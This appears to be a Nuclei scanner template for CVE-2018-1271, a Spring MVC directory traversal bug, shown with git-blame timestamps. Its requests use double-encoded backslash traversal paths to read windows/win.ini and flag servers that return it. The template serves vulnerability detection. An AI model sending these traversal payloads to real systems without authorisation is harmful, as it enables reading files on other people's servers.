2020-06-03 00:53:25 +00:00
|
|
|
id: CVE-2018-1271
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Spring MVC Directory Traversal Vulnerability
|
|
|
|
author: hetroublemakr
|
2020-08-31 18:34:29 +00:00
|
|
|
severity: high
|
2020-06-03 00:53:25 +00:00
|
|
|
# reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
|
|
|
|
- '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-06-03 00:53:25 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- 'for 16-bit app support'
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|